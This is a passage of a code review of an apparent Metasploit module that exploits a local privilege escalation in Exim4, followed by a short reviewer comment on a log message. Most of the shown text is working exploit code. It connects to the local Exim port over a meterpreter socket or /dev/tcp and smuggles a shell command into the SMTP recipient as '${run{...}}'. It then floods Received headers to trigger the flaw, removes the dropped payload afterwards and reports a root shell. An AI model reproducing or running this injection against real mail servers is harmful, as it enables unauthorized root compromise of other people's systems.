modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb

```diff
@@ -0,0 +1,189 @@
+    ))
+
+    register_options(
+      [
+        OptString.new('EXIMPATH', [ false, 'The path to the exim executable (used to check for vulnerability)' ]),
+        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def encode_command(cmd)
+    '\x' + cmd.unpack('H2' * cmd.length).join('\x')
+  end
+
+  def inject_payload(payload)
+    if session.type == 'meterpreter'
+      socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
+      params = Rex::Socket::Parameters.new({
+        'PeerHost' => '127.0.0.1',
+        'PeerPort' => datastore['EXIMPORT']
+      })
+      socket = socket_subsystem.create_tcp_client_channel(params)
+      socket.gets
+      socket.puts("helo localhost\n")
+      socket.gets
+      socket.puts("mail from:<>\n")
+      socket.gets
+      socket.puts("rcpt to:<${run{#{payload}}}@localhost>\n")
+      socket.gets
+      socket.puts("data\n")
+      socket.gets
+      for i in (1..31)
+        socket.puts("Received: #{i}\n")
+      end
+      socket.puts(".\n")
+      socket.gets
+      socket.puts("quit\n")
+      socket.close
+      socket_subsystem.shutdown
+    else
+      res = cmd_exec("exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}")
+
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "helo localhost" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "mail from:<>" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec("echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3")
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "data" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      for i in (1..31)
+        cmd_exec("echo 'Received: #{i}' >&3")
+      end
+      cmd_exec('echo "." >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "quit" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('exec 3<&-')
+    end
+
+    print_status('Payload sent, wait a few seconds...')
+    Rex.sleep(5)
+  end
+
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      session.fs.file.rm(@payload_path)
+    else
+      session.shell_command_token("rm -f #{@payload_path}")
+    end
+
+    print_good("Check session #{session.name}, you should have a root shell!")
+  end
+
+  def check
+    exim = datastore['EXIMPATH'] ? datastore['EXIMPATH'] : 'exim'
+
+    res = cmd_exec("#{exim} -bV")
+    if res =~ /Exim version ([0-9\.]*) /i # Maybe improve the regex
+      version = Gem::Version.new($1)
+      vprint_status("Detected running exim version: #{version}")
```

Comment:
exim is present, but may not be running.

```suggestion
      vprint_status("Found exim version: #{version}")
```